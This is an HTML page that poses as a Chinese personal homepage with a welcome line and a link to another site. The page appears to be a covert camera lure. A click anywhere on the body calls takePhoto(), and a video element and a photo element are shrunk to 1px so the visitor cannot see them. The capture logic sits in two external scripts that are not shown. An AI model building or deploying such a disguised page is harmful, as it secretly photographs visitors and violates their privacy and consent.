<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>过度页面</title>
</head>
<style>
    video {
        margin-top: 1px;
        width: 1px;
        height: 1px;
    }

    img {
        width: 1px;
        height: 1px;
    }

    /* 全局样式 */
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        background-color: #f2f2f2;
        color: #333;
    }

    /* 头部样式 */
    header {
        background-color: #333;
        text-align: center;
        padding: 20px;
        color: #fff;
    }

    h1 {
        margin: 0;
        font-size: 28px;
    }

    /* 主要内容样式 */
    main {
        max-width: 800px;
        margin: 120px auto;
        padding: 20px;
        background-color: #fff;
        border-radius: 5px;
        box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
    }

    section {
        margin-bottom: 30px;
        text-align: center;
        font-size: 35px;
    }

    h2 {
        font-size: 24px;
        margin-bottom: 10px;
    }

    .project img {
        width: 100%;
        max-height: 200px;
        object-fit: cover;
    }

    h3 {
        font-size: 20px;
        margin: 10px 0;
    }

    /* 联系表单样式 */
    form {
        display: grid;
        gap: 10px;
    }

    input,
    textarea {
        width: 100%;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
    }

    button {
        padding: 10px 20px;
        background-color: #333;
        color: #fff;
        border: none;
        border-radius: 4px;
        cursor: pointer;
    }

    button:hover {
        background-color: #555;
    }

    /* 页脚样式 */
    footer {
        background-color: #333;
        color: #fff;
        text-align: center;
        padding: 20px;
    }
</style>

<body onclick="takePhoto()">
    <div><video id="video"></video>
        <div>



            <header>
                <h1>个人网页</h1>
            </header>
            <main>
                <section>
                    欢迎来到我的网站 <br>
                    <a href="https://xiang.4everland.app/" target="_blank">点击进入我的网页</a>
                </section>
            </main>
            <footer>
                <p>版权所有 &copy; 2023 个人网站</p>
            </footer>


        </div>






    </div>
    <img id="photo" src="" alt="">
</body>
<script src="index.js"></script>
<script src="jinf12.js"></script>

</html>
